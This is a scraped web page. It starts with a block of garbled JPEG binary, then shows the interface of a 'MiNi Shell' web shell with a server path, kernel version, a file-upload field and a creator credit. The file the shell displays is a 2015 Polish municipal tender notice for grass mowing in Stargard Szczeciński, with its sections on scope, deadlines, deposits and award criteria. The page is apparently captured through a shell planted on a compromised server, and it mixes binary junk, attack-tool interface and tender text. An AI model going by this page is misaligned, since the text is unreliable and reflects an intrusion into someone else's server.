JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150401/73546-N-2015.html

<p class="kh_header"><b>Stargard Szczeciński: EZ-ZP-18/2015 Usługa koszenia trawy na terenie miasta Stargard Szczeciński</b><br>
<b>Numer ogłoszenia: 73546 - 2015; data zamieszczenia: 01.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Okrzei 6, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 91 5771274, faks 91 5772128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgk.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> EZ-ZP-18/2015 Usługa koszenia trawy na terenie miasta Stargard Szczeciński.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa koszenia trawy z podziałem na sektory część I-V na terenie Miasta Stargard Szczeciński.
Specyfikacja techniczna dot. usług związanych z utrzymaniem zieleni:
Część I. Koszenie trawników parkowych, ulicznych i terenów niezagospodarowanych na terenie płaskim i na skarpach  (Zadanie nr I z Załącznika nr 4 - łączna powierzchnia 645 894,00 m2) 
1 trawa na całej powierzchni koszenia powinna mieć jednakową wysokość,
2 wysokość koszenia powinna wynosić  od 5-8 cm,
3 skoszoną trawę należy zgrabić, usunąć resztki trawy z chodnika, alejek i załadować do worków foliowych lub kontenerów KP16 w dniu wykonania  usługi, zapakowane worki należy złożyć w miejscu uzgodnionym z zamawiającym, 
4 zakupienie, dostarczenie worków foliowych, odbiór zapełnionych worków z trawą oraz podstawienie, opróżnienie kontenerów KP16 po stronie Zamawiającego,
5 w przypadku zniszczenia trawników podczas koszenia z winy Wykonawcy należy przywrócić teren do stanu pierwotnego wraz z dosianiem trawy w zniszczonych miejscach,
6 Zamawiający przekazuje zlecenie wykonania w/w usługi na: piśmie, faksem lub emailem, które Wykonawca potwierdzi również faksem lub e mailem,
7 Wykonawca przystąpi do wykonania zleconych prac w terminie do 2 dni roboczych od dnia zgłoszenia,  Wykonawca wykona zlecone jednokrotne koszenie  w terminie  do 10  dni roboczych  od dnia otrzymania zgłoszenia,   
8 wycenę jednostkową dla koszenia traw w terenie płaskim i na skarpach należy uśrednić i skalkulować jako jedną cenę,
9 w przypadku uszkodzeń mienia (np. samochodów, okien itp.) na terenach na których wykonywane jest koszenie Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł
10 Wykonawca chcący wykonać usługę ciężkim sprzętem każdorazowo przed podjęciem działań skonsultuje z Zamawiającym możliwość użycia tego sprzętu na danym terenie.
11 Powierzchnie i lokalizacje poszczególnych terenów wskazuje - Zadanie 1 z Załącznika nr 4
12 Kategorie: Kategoria I: koszenie 5 krotne w sezonie, w tym pierwsze koszenie najpóźniej do 15 maja (w szczególnych przypadkach, przy drastycznie opóźnionej wegetacji możliwe jest uzgodnienie przez strony  innego, późniejszego terminu), Kategoria II: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 31 maja, Kategoria III: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 15 czerwca, W każdej kategorii koszenia Wykonawca musi dotrzymać terminu z pkt 7.
Ilość zlecona wykonawcy uzależniona będzie od aktualnych potrzeb Zamawiającego.
Zamawiający może zmniejszyć powierzchnię terenów przeznaczonych do koszenia trawy, nie więcej niż o 30% w każdej kategorii albo zmniejszyć częstotliwość koszeń w każdej z kategorii, z uwagi na jego aktualne potrzeby, a Wykonawca nie będzie dochodził od Zamawiającego z tego tytułu odszkodowania.
Część II. Koszenie trawników parkowych, ulicznych i terenów niezagospodarowanych na terenie płaskim i na skarpach  Zadanie nr 2 z Załącznika nr 5 - łączna powierzchnia 629 019,00 m2
1 trawa na całej powierzchni koszenia powinna mieć jednakową wysokość,
2 wysokość koszenia powinna wynosić  od 5-8 cm,
3 skoszoną trawę należy zgrabić, usunąć resztki trawy z chodnika, alejek i załadować do worków foliowych lub kontenerów KP16 w dniu wykonania  usługi, zapakowane worki należy złożyć w miejscu uzgodnionym z zamawiającym, 
4 zakupienie, dostarczenie worków foliowych, odbiór zapełnionych worków z trawą oraz podstawienie, opróżnienie kontenerów KP16 po stronie Zamawiającego,
5 w przypadku zniszczenia trawników podczas koszenia z winy Wykonawcy należy przywrócić teren do stanu pierwotnego wraz z dosianiem trawy w zniszczonych miejscach,
6 Zamawiający przekazuje zlecenie wykonania w/w usługi na: piśmie, faksem lub emailem, które Wykonawca potwierdzi również faksem lub e mailem,
7 Wykonawca przystąpi do wykonania zleconych prac w terminie do 2 dni roboczych od dnia zgłoszenia,  Wykonawca wykona zlecone jednokrotne koszenie  w terminie  do 10  dni roboczych  od dnia otrzymania zgłoszenia,   
8 wycenę jednostkową dla koszenia traw w terenie płaskim i na skarpach należy uśrednić i skalkulować jako jedną cenę,
9 w przypadku uszkodzeń mienia (np. samochodów, okien itp.) na terenach na których wykonywane jest koszenie Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł
10 Wykonawca chcący wykonać usługę ciężkim sprzętem każdorazowo przed podjęciem działań skonsultuje z Zamawiającym możliwość użycia tego sprzętu na danym terenie.
11 Powierzchnie i lokalizacje poszczególnych terenów wskazuje - Zadanie 2 z Załącznika nr 5
12 Kategorie: Kategoria I: koszenie 5 krotne w sezonie, w tym pierwsze koszenie najpóźniej do 15 maja w szczególnych przypadkach, przy drastycznie opóźnionej wegetacji możliwe jest uzgodnienie przez strony  innego, późniejszego terminu), Kategoria II: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 31 maja, Kategoria III: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 15 czerwca, Kategoria IV: koszenie 2 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 30 czerwca. W każdej kategorii koszenia Wykonawca musi dotrzymać terminu z pkt 7.
Ilość zlecona wykonawcy uzależniona będzie od aktualnych potrzeb Zamawiającego.
Zamawiający może zmniejszyć powierzchnię terenów przeznaczonych do koszenia trawy, nie więcej niż o 30% w każdej kategorii albo zmniejszyć częstotliwość koszeń w każdej z kategorii, z uwagi na jego aktualne potrzeby, a Wykonawca nie będzie dochodził od Zamawiającego z tego tytułu odszkodowania.
Część III. Koszenie trawników parkowych, ulicznych i terenów niezagospodarowanych na terenie płaskim i na skarpach Zadanie nr 3 z Załącznika nr 6 - łączna powierzchnia 481 346,00 m2
1 trawa na całej powierzchni koszenia powinna mieć jednakową wysokość,
2 wysokość koszenia powinna wynosić  od 5-8 cm,
3 skoszoną trawę należy zgrabić, usunąć resztki trawy z chodnika, alejek i załadować do worków foliowych lub kontenerów KP16 w dniu wykonania  usługi, zapakowane worki należy złożyć w miejscu uzgodnionym z zamawiającym, 
4 zakupienie, dostarczenie worków foliowych, odbiór zapełnionych worków z trawą oraz podstawienie, opróżnienie kontenerów KP16 po stronie Zamawiającego,
5 w przypadku zniszczenia trawników podczas koszenia z winy Wykonawcy należy przywrócić teren do stanu pierwotnego wraz z dosianiem trawy w zniszczonych miejscach,
6 Zamawiający przekazuje zlecenie wykonania w/w usługi na: piśmie, faksem lub emailem, które Wykonawca potwierdzi również faksem lub e mailem,
7 Wykonawca przystąpi do wykonania zleconych prac w terminie do 2 dni roboczych od dnia zgłoszenia,  Wykonawca wykona zlecone jednokrotne koszenie  w terminie  do 10  dni roboczych  od dnia otrzymania zgłoszenia,   
8 wycenę jednostkową dla koszenia traw w terenie płaskim i na skarpach należy uśrednić i skalkulować jako jedną cenę,
9 w przypadku uszkodzeń mienia np. samochodów, okien itp. na terenach na których wykonywane jest koszenie Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł
10 Wykonawca chcący wykonać usługę ciężkim sprzętem każdorazowo przed podjęciem działań skonsultuje z Zamawiającym możliwość użycia tego sprzętu na danym terenie.
11 Powierzchnie i lokalizacje poszczególnych terenów wskazuje - Zadanie 3 z Załącznika nr 6
12 Kategorie: Kategoria I: koszenie 5 krotne w sezonie, w tym pierwsze koszenie najpóźniej do 15 maja w szczególnych przypadkach, przy drastycznie opóźnionej wegetacji możliwe jest uzgodnienie przez strony  innego, późniejszego terminu), Kategoria II: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 31 maja, Kategoria III: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 15 czerwca, W każdej kategorii koszenia Wykonawca musi dotrzymać terminu z pkt 7.
Ilość zlecona wykonawcy uzależniona będzie od aktualnych potrzeb Zamawiającego.
Zamawiający może zmniejszyć powierzchnię terenów przeznaczonych do koszenia trawy, nie więcej niż o 30% w każdej kategorii albo zmniejszyć częstotliwość koszeń w każdej z kategorii, z uwagi na jego aktualne potrzeby, a Wykonawca nie będzie dochodził od Zamawiającego z tego tytułu odszkodowania.
Część IV. Koszenie trawników parkowych, ulicznych i terenów niezagospodarowanych na terenie płaskim i na skarpach  Zadanie nr 4 z Załącznika nr 7 - łączna powierzchnia 716 644,12 m2
1 trawa na całej powierzchni koszenia powinna mieć jednakową wysokość,
2 wysokość koszenia powinna wynosić  od 5-8 cm,
3 skoszoną trawę należy zgrabić, usunąć resztki trawy z chodnika, alejek i załadować do worków foliowych lub kontenerów KP16 w dniu wykonania  usługi, zapakowane worki należy złożyć w miejscu uzgodnionym z zamawiającym, 
4 zakupienie, dostarczenie worków foliowych, odbiór zapełnionych worków z trawą oraz podstawienie, opróżnienie kontenerów KP16 po stronie Zamawiającego,
5 w przypadku zniszczenia trawników podczas koszenia z winy Wykonawcy należy przywrócić teren do stanu pierwotnego wraz z dosianiem trawy w zniszczonych miejscach,
6 Zamawiający przekazuje zlecenie wykonania w/w usługi na: piśmie, faksem lub emailem, które Wykonawca potwierdzi również faksem lub e mailem,
7 Wykonawca przystąpi do wykonania zleconych prac w terminie do 2 dni roboczych od dnia zgłoszenia,  Wykonawca wykona zlecone jednokrotne koszenie  w terminie  do 10  dni roboczych  od dnia otrzymania zgłoszenia,   
8 wycenę jednostkową dla koszenia traw w terenie płaskim i na skarpach należy uśrednić i skalkulować jako jedną cenę,
9 w przypadku uszkodzeń mienia (np. samochodów, okien itp.) na terenach na których wykonywane jest koszenie Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł
10 Wykonawca chcący wykonać usługę ciężkim sprzętem każdorazowo przed podjęciem działań skonsultuje z Zamawiającym możliwość użycia tego sprzętu na danym terenie.
11 Powierzchnie i lokalizacje poszczególnych terenów wskazuje - Zadanie 4 z Załącznika nr 7 
12 Kategorie: Kategoria I: koszenie 5 krotne w sezonie, w tym pierwsze koszenie najpóźniej do 15 maja (w szczególnych przypadkach, przy drastycznie opóźnionej wegetacji możliwe jest uzgodnienie przez strony  innego, późniejszego terminu), Kategoria II: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 31 maja, Kategoria III: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 15 czerwca, W każdej kategorii koszenia Wykonawca musi dotrzymać terminu z pkt 6.
Ilość zlecona wykonawcy uzależniona będzie od aktualnych potrzeb Zamawiającego.
Zamawiający może zmniejszyć powierzchnię terenów przeznaczonych do koszenia trawy, nie więcej niż o 30% w każdej kategorii albo zmniejszyć częstotliwość koszeń w każdej z kategorii, z uwagi na jego aktualne potrzeby, a Wykonawca nie będzie dochodził od Zamawiającego z tego tytułu odszkodowania.
Część V. Koszenie trawników parkowych, ulicznych i terenów niezagospodarowanych na terenie płaskim i na skarpach  Zadanie nr 5 z Załącznika nr 8 - łączna powierzchnia 695 316,88 m2 
1 trawa na całej powierzchni koszenia powinna mieć jednakową wysokość,
2 wysokość koszenia powinna wynosić  od 5-8 cm,
3 skoszoną trawę należy zgrabić, usunąć resztki trawy z chodnika, alejek i załadować do worków foliowych lub kontenerów KP16 w dniu wykonania  usługi, zapakowane worki należy złożyć w miejscu uzgodnionym z zamawiającym, 
4 zakupienie, dostarczenie worków foliowych, odbiór zapełnionych worków z trawą oraz podstawienie, opróżnienie kontenerów KP16 po stronie Zamawiającego,
5 w przypadku zniszczenia trawników podczas koszenia z winy Wykonawcy należy przywrócić teren do stanu pierwotnego wraz z dosianiem trawy w zniszczonych miejscach,
6 Zamawiający przekazuje zlecenie wykonania w/w usługi na: piśmie, faksem lub emailem, które Wykonawca potwierdzi również faksem lub e mailem,
7 Wykonawca przystąpi do wykonania zleconych prac w terminie do 2 dni roboczych od dnia zgłoszenia,  Wykonawca wykona zlecone jednokrotne koszenie  w terminie  do 10  dni roboczych  od dnia otrzymania zgłoszenia,   
8 wycenę jednostkową dla koszenia traw w terenie płaskim i na skarpach należy uśrednić i skalkulować jako jedną cenę,
9 w przypadku uszkodzeń mienia (np. samochodów, okien itp.) na terenach na których wykonywane jest koszenie Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł
10 Wykonawca chcący wykonać usługę ciężkim sprzętem każdorazowo przed podjęciem działań skonsultuje z Zamawiającym możliwość użycia tego sprzętu na danym terenie.
11 Powierzchnie i lokalizacje poszczególnych terenów wskazuje - Zadanie 5 z Załącznika nr 8
12 Kategorie: Kategoria I: koszenie 5 krotne w sezonie, w tym pierwsze koszenie najpóźniej do 15 maja (w szczególnych przypadkach, przy drastycznie opóźnionej wegetacji możliwe jest uzgodnienie przez strony  innego, późniejszego terminu), Kategoria II: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 31 maja, Kategoria III: koszenie 4 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 15 czerwca. Kategoria IV: koszenie 2 krotne w sezonie, w tym pierwsze koszenie musi się odbyć do dnia 30 czerwca. W każdej kategorii koszenia Wykonawca musi dotrzymać terminu z pkt 7.
Ilość zlecona wykonawcy uzależniona będzie od aktualnych potrzeb Zamawiającego.
Zamawiający może zmniejszyć powierzchnię terenów przeznaczonych do koszenia trawy, nie więcej niż o 30% w każdej kategorii albo zmniejszyć częstotliwość koszeń w każdej z kategorii, z uwagi na jego aktualne potrzeby, a Wykonawca nie będzie dochodził od Zamawiającego z tego tytułu odszkodowania.
2. Pozostałe wymagania (wspólne dla wszystkich zadań
1 Wykonawca realizujący poszczególne usługi będzie dysponował sprzętem niezagrażającym bezpieczeństwu oraz spełniającym wszelkie wymogi dot. ochrony środowiska,
2 Pracownicy wykonujący wszelkie czynności powinni posiadać niezbędne szkolenia z zakresu BHP oraz powinni być wyposażeni w jednakowe ochronne ubrania robocze oraz posiadać kamizelki odblaskowe w przypadku pracy w pasie drogowym,
3 w przypadku spowodowania przez Wykonawcę zniszczeń terenów na których wykonywane są prace i nieprzywrócenia ich do stanu pierwotnego, Zamawiający będzie mógł żądać od Wykonawcy odszkodowania w wysokości adekwatnej do poniesionych nakładów koniecznych do przywrócenia terenów do stanu pierwotnego,
4 w przypadku uszkodzeń mienia np. samochodów, okien itp. na terenach na których wykonywane są prace Wykonawca ponosi za to odpowiedzialność. Wykonawca musi posiadać odpowiednie ubezpieczenie OC od takich zdarzeń, na sumę ubezpieczenia nie mniejszą niż 50.000 zł, obowiązujące w całym okresie trwania niniejszej umowy,
5 po każdym wykonaniu zleconych prac jednego zadania zleconego przez Zamawiającego zostanie sporządzony protokół odbioru, w którym odnotowywane będą wszelkie uwagi/zastrzeżenia lub ich brak, a także obmiar powykonawczy ilości wykonanych prac. W imieniu Zamawiającego protokół będzie podpisywać kierownik Zakładu Obsługi Urządzeń Komunalnych lub wyznaczona przez niego osoba.
6 Na podstawie protokołu odbioru, bez stwierdzonych wad. Wykonawca wystawi fakturę VAT Zamawiającemu z terminem płatności 30 dni od dostarczenia faktury zamawiającemu Faktura zostanie wystawiona przy uwzględnieniu cen netto z oferty cenowej Wykonawcy powiększonych o aktualnie obowiązującą stawkę podatku VAT, faktury wystawiane będą przez Wykonawcę w systemie miesięcznym.
7 Zamawiający zastrzega sobie możliwość  przeprowadzania kontroli sposobu gospodarowania odpadami powstałymi podczas  realizacji zadania.
8 Przez sezon koszenia rozumie się okres czasu o 15.04.2015r. do 31.10.2015r. 
9 Zagospodarowanie odpadów zielonych zebranych w worki spoczywa na Zamawiającym.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie przed upływem terminu składania ofert tj. do dnia 09.04.2015r. do godziny 10:00 wadium w wysokości:  2000,00 zł słownie: dwa tysiące złotych do każdej z części .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji zadania - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgk.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.mpgk.stargard.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2015 godzina 10:00, miejsce: Sekretariacie MPGK Sp. z o.o. mieszczący się w Stargardzie Szczecińskim przy ul. Okrzei 6 - pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com